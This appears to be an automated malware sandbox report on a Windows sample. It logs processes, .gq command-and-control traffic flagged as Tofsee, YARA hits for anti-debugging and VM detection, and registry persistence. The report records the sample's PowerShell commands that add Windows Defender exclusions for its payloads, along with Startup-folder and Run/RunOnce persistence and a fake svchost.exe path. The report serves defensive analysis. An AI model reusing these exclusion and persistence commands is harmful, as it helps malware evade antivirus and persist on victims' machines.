Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | July 1, 2021, 8:05 a.m. | July 1, 2021, 8:12 a.m. |
-
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force
6012 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force
3752 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force
6200 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force
4672 -
tj85xg1cs.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe"
2268-
tj85xg1cs.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe"
5572-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force
3352 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force
4828 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force
296 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force
7196 -
-
timeout.exe timeout 1
1308
-
-
tj85xg1cs.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe"
532
-
-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force
8572 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force
6596 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force
5992 -
-
timeout.exe timeout 1
5988
-
-
ujunkwerex.exe "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe"
2488
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
kakosidobrosam.gq | 104.21.67.197 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.102:57660 -> 164.124.101.2:53 | 2025104 | ET INFO DNS Query for Suspicious .gq Domain | Potentially Bad Traffic |
TCP 192.168.56.102:49806 -> 172.67.180.37:443 | 2025108 | ET INFO Suspicious Domain (*.gq) in TLS SNI | Potentially Bad Traffic |
TCP 192.168.56.102:49806 -> 172.67.180.37:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49806 172.67.180.37:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a2:99:7f:61:26:e9:24:3e:96:d0:98:83:eb:e0:35:eb:07:a8:19:f8 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET https://kakosidobrosam.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE44F55B90FB18A2A4452FA478F7245A.html |
request | GET https://kakosidobrosam.gq/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1235E527CC34D56F5639DB569338CB90.html |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
cmdline | cmd.exe /c timeout 1 |
cmdline | "C:\Windows\System32\cmd.exe" /c timeout 1 |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tj85xg1cs.exe" -Force |
cmdline | powershell Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe" -Force |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ujunkwerex.exe" -Force |
description | Communications use DNS | rule | Network_DNS | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Qemu_Description | ||||||
description | (no description) | rule | Check_Qemu_DeviceMap | ||||||
description | (no description) | rule | Check_VBox_Description | ||||||
description | (no description) | rule | Check_VBox_DeviceMap | ||||||
description | (no description) | rule | Check_VBox_Guest_Additions | ||||||
description | (no description) | rule | Check_VBox_VideoDrivers | ||||||
description | (no description) | rule | Check_VMWare_DeviceMap | ||||||
description | (no description) | rule | Check_VmTools | ||||||
description | Detection of Virtual Appliances through the use of WMI for use of evasion. | rule | WMI_VM_Detect | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names. | rule | vmdetect_misc | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Qemu_Description | ||||||
description | (no description) | rule | Check_Qemu_DeviceMap | ||||||
description | (no description) | rule | Check_VBox_Description | ||||||
description | (no description) | rule | Check_VBox_DeviceMap | ||||||
description | (no description) | rule | Check_VBox_Guest_Additions | ||||||
description | (no description) | rule | Check_VBox_VideoDrivers | ||||||
description | (no description) | rule | Check_VMWare_DeviceMap | ||||||
description | (no description) | rule | Check_VmTools |
buffer | Buffer with sha1: 9420a2004c14c4a5e31290936a07bd58dcaa15b3 |
buffer | Buffer with sha1: 636b8187f0cb59d43c9ee1eedf144043941b62d9 |
buffer | Buffer with sha1: 4380fb6de89a7776d52214359ce213d24a2239ad |
buffer | Buffer with sha1: c19d9db351af75fec019fe76506a455eba7fd168 |
buffer | Buffer with sha1: c1ef2ca62189121934d1a7944ef1bdc1aa319877 |
buffer | Buffer with sha1: 063fb8b27c0872c54bff35e2b76d8f522e13f8b4 |
buffer | Buffer with sha1: 925c5236c59dd8f3efea4b3e091ef735b405a880 |
buffer | Buffer with sha1: c54e7c5cac5fac68dc564ce64355d948422bf1ce |
buffer | Buffer with sha1: dcdec0ea839844e977c1151d2eeedbb0788a34b1 |
buffer | Buffer with sha1: 0c6598a0a37eaf12ce188fa66bc6c5db394af8a4 |
buffer | Buffer with sha1: 874b7c3c97cc5b13b9dd172fec5a54bc1f258005 |
buffer | Buffer with sha1: efa4948abb218e47d809bedd1aff08cfb76d40e1 |
buffer | Buffer with sha1: 1b68e773e3522fa8edc7cb20d7c7f156b08ec73a |
buffer | Buffer with sha1: 874f3caf663265f7dd18fb565d91b7d915031251 |
host | 172.217.25.14 | |||
host | 79.134.225.87 |
description | ujunkwerex.exe tried to sleep 5920114346 seconds, actually delayed analysis time by 5920114346 seconds |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\tj85xg1cs | reg_value | C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\tj85xg1cs | reg_value | C:\Windows\Resources\Themes\cbMadd8augIa6FPb2b0WT9H3Ncddgaq6QZ2084\svchost.exe | ||||||
reg_key | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SMTP Host | reg_value | C:\Program Files (x86)\SMTP Host\smtphost.exe |